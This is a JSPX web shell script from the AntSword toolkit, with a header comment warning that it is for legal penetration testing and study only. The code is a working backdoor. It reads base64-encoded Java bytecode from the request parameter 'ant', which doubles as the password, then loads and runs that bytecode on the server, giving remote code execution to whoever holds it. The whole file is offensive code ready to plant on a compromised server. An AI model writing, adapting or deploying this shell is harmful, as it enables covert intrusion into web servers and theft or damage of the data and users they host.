<!--
        _   ____                       _
        __ _ _ __ | |_/ ___|_      _____  _ __ __| |
        / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
        | (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
        \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
        ———————————————————————————————————————————————
        AntSword JSPX Defineclass Script
        警告：
        此脚本仅供合法的渗透测试以及爱好者参考学习
        请勿用于非法用途，否则将追究其相关责任！
        ———————————————————————————————————————————————
        pass: ant
-->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
    <jsp:declaration>
        class U extends ClassLoader {
            U(ClassLoader c) {
                super(c);
            }
            public Class g(byte[] b) {
                return super.defineClass(b, 0, b.length);
            }
        }
        public byte[] base64Decode(String str) throws Exception {
            Class base64;
            byte[] value = null;
            try {
                base64=Class.forName("sun.misc.BASE64Decoder");
                Object decoder = base64.newInstance();
                value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
            } catch (Exception e) {
                try {
                    base64=Class.forName("java.util.Base64");
                    Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
                    value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
                } catch (Exception ee) {}
            }
            return value;
        }
    </jsp:declaration>
    <jsp:scriptlet>
        String cls = request.getParameter("ant");
        if (cls != null) {
            new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
        }
    </jsp:scriptlet>
</jsp:root>
